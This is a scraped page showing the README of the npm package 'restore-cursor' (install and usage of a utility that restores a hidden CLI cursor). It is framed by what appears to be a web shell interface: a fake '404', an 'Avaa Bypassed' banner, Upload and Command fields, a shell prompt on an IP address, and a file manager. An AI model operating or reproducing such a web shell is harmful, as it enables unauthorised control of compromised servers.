404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.14.128.23: ~ $
# restore-cursor [![Build Status](https://travis-ci.org/sindresorhus/restore-cursor.svg?branch=master)](https://travis-ci.org/sindresorhus/restore-cursor)

> Gracefully restore the CLI cursor on exit

Prevent the cursor you've hidden interactively from remaining hidden if the process crashes.


## Install

```
$ npm install restore-cursor
```


## Usage

```js
const restoreCursor = require('restore-cursor');

restoreCursor();
```


## License

MIT © [Sindre Sorhus](https://sindresorhus.com)

Filemanager

Name Type Size Permission Actions
index.d.ts File 201 B 0644
index.js File 215 B 0644
license File 1.08 KB 0644
package.json File 3.61 KB 0644
readme.md File 497 B 0644